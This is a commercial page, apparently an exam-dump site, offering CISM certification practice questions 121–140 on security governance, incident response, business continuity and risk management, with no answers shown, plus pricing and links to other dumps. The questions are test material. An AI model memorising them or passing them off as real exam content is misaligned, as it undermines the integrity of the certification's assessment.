Spring Sale Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 65pass65

CISM Certified Information Security Manager is now Stable and With Pass Result | Test Your Knowledge for Free

  1. Home
  2. Isaca
  3. Isaca Certification
  4. CISM
  5. Certified Information Security Manager
Exams4sure Dumps

CISM Practice Questions

Certified Information Security Manager

Last Update 3 days ago
Total Questions : 1044

Dive into our fully updated and stable CISM practice test platform, featuring all the latest Isaca Certification exam questions added this week. Our preparation tool is more than just a Isaca study aid; it's a strategic advantage.

Our free Isaca Certification practice questions crafted to reflect the domains and difficulty of the actual exam. The detailed rationales explain the 'why' behind each answer, reinforcing key concepts about CISM. Use this test to pinpoint which areas you need to focus your study on.

CISM PDF

CISM PDF (Printable)
$69.65
$199
 Add to Cart

CISM Testing Engine

CISM PDF (Printable)
$78.75
$225
 Add to Cart

CISM PDF + Testing Engine

CISM PDF (Printable)
$87.15
$249
 Add to Cart
Question # 121

Which of the following BEST enables the integration of information security governance into corporate governance?

Options:

A.  

Well-decumented information security policies and standards

B.  

An information security steering committee with business representation

C.  

Clear lines of authority across the organization

D.  

Senior management approval of the information security strategy

Discussion 0
Question # 122

A small organization has a contract with a multinational cloud computing vendor. Which of the following would present the GREATEST concern to an information security manager if omitted from the contract?

Options:

A.  

Right of the subscriber to conduct onsite audits of the vendor

B.  

Escrow of software code with conditions for code release

C.  

Authority of the subscriber to approve access to its data

D.  

Commingling of subscribers' data on the same physical server

Discussion 0
Question # 123

Regular vulnerability scanning on an organization's internal network has identified that many user workstations have unpatched versions of software. What is the BEST way for the information security manager to help senior management understand the related risk?

Options:

A.  

Include the impact of the risk as part of regular metrics.

B.  

Recommend the security steering committee conduct a review.

C.  

Update the risk assessment at regular intervals

D.  

Send regular notifications directly to senior managers

Discussion 0
Question # 124

To prepare for a third-party forensics investigation following an incident involving malware, the incident response team should:

Options:

A.  

isolate the infected systems.

B.  

preserve the evidence.

C.  

image the infected systems.

D.  

clean the malware.

Discussion 0
Question # 125

Labeling information according to its security classification:

Options:

A.  

enhances the likelihood of people handling information securely.

B.  

reduces the number and type of countermeasures required.

C.  

reduces the need to identify baseline controls for each classification.

D.  

affects the consequences if information is handled insecurely.

Discussion 0
Question # 126

A security incident has been reported within an organization. When should an information security manager contact the information owner?

Options:

A.  

After the incident has been contained

B.  

After the incident has been mitigated

C.  

After the incident has been confirmed

D.  

After the potential incident has been logged

Discussion 0
Question # 127

Which of the following processes is MOST important for the success of a business continuity plan (BCP)?

Options:

A.  

Involving all stakeholders in testing and training

B.  

Scheduling periodic internal and external audits

C.  

Including the board and senior management in plan reviews

D.  

Maintaining copies of the plan at the primary and recovery sites

Discussion 0
Question # 128

Which of the following is the BEST course of action when an online company discovers a network attack in progress?

Options:

A.  

Dump all event logs to removable media

B.  

Isolate the affected network segment

C.  

Enable trace logging on ail events

D.  

Shut off all network access points

Discussion 0
Question # 129

When management changes the enterprise business strategy which of the following processes should be used to evaluate the existing information security controls as well as to select new information security controls?

Options:

A.  

Configuration management

B.  

Risk management

C.  

Access control management

D.  

Change management

Discussion 0
Question # 130

Which of the following is the BEST way to reduce the risk associated with a bring your own device (BYOD) program?

Options:

A.  

Implement a mobile device policy and standard.

B.  

Provide employee training on secure mobile device practices.

C.  

Implement a mobile device management (MDM) solution.

D.  

Require employees to install an effective anti-malware app.

Discussion 0
Question # 131

Which of the following is the MOST likely reason for a vulnerability scanner to return incomplete results?

Options:

A.  

Unauthenticated vulnerability scans are being performed.

B.  

Scan results are not ingested into a security information and event management (SIEM) tool.

C.  

Host names have not been fully enumerated.

D.  

Zero-day vulnerability signatures have not been ingested.

Discussion 0
Question # 132

An organization is considering the feasibility of implementing a big data solution to analyze customer data. In order to support this initiative, the information security manager should FIRST:

Options:

A.  

inventory sensitive customer data to be processed by the solution.

B.  

determine information security resource and budget requirements.

C.  

assess potential information security risk to the organization.

D.  

develop information security requirements for the big data solution.

Discussion 0
Question # 133

Which type of policy BEST helps to ensure that all employees, contractors, and third-party users receive formal communication regarding an organization’s security program?

Options:

A.  

Management review policy

B.  

Business continuity management policy

C.  

Information security training policy

D.  

Security incident management policy

Discussion 0
Question # 134

Which of the following is the MOST effective way to protect the authenticity of data in transit?

Options:

A.  

Digital signature

B.  

Private key

C.  

Access controls

D.  

Public key

Discussion 0
Question # 135

Which of the following should an information security manager do FIRST upon learning that some security hardening settings may negatively impact future business activity?

Options:

A.  

Perform a risk assessment.

B.  

Reduce security hardening settings.

C.  

Inform business management of the risk.

D.  

Document a security exception.

Discussion 0
Question # 136

An organization is going through a digital transformation process, which places the IT organization in an unfamiliar risk landscape. The information security manager has been tasked with leading the IT risk management process. Which of the following should be given the HIGHEST priority?

Options:

A.  

Identification of risk

B.  

Analysis of control gaps

C.  

Design of key risk indicators (KRIs)

D.  

Selection of risk treatment options

Discussion 0
Question # 137

What is the PRIMARY objective of performing a vulnerability assessment following a business system update?

Options:

A.  

Determine operational losses.

B.  

Improve the change control process.

C.  

Update the threat landscape.

D.  

Review the effectiveness of controls

Discussion 0
Question # 138

A business impact analysis (BIA) BEST enables an organization to establish:

Options:

A.  

annualized loss expectancy (ALE).

B.  

recovery methods.

C.  

total cost of ownership (TCO).

D.  

restoration priorities.

Discussion 0
Question # 139

Which of the following would be an information security managers PRIMARY challenge when deploying a bring your own device (BYOD) mobile program in an enterprise?

Options:

A.  

Mobile application control

B.  

Inconsistent device security

C.  

Configuration management

D.  

End user acceptance

Discussion 0
Question # 140

Management of a financial institution accepted an operational risk that consequently led to the temporary deactivation to a critical monitoring process. Which of the following should be the information security manager's GREATEST concern with this situation?

Options:

A.  

Impact on compliance risk.

B.  

Inability to determine short-term impact.

C.  

Impact on the risk culture.

D.  

Deviation from risk management best practices

Discussion 0
Get CISM dumps and pass your exam in 24 hours!

Free Exams Sample Questions

Free SY0-701 Questions
Free Rev-Con-201 Questions
Free 2V0-13.25 Questions
Free ZDTE Questions
Free N10-009 Questions
Free 200-301 Questions
Free AZ-104 Questions
Free 350-401 Questions
Free 2V0-17.25 Questions
Free CMMC-CCP Questions
Free AIF-C01 Questions
Free CMMC-CCA Questions
Free AI-102 Questions
Free 312-50v13 Questions
Free ICWIM Questions
Free CKA Questions
Free SC-200 Questions
Free SC-300 Questions
Free OGEA-102 Questions
NGFW-Engineer Questions
ISA-IEC-62443 Questions
Free Agentforce Specialist Questions
Free Generative-AI-Leader Questions
Free FCSS_EFW_AD-7.6 Questions
Free Secure-Software-Design Questions
Free Data-Cloud-Consultant Questions
Free Workday-Pro-Integrations Questions
Free UAE-Financial-Rules-and-Regulations Questions
AWS-Solution-Architect-Associate Dumps
Professional-Cloud-Architect Dumps
Service-Cloud-Consultant Dumps
Platform-App-Builder Dumps
AZ-500 Dumps
Associate-Cloud-Engineer Dumps
350-701 Dumps
ISO-IEC-27001-Lead-Implementer Dumps
Integration-Architect Dumps
CLF-C02 Dumps
JN0-105 Dumps
CDCP Dumps
CTA Dumps
NCP-MCI-6.10 Dumps
NCA-AIIO Dumps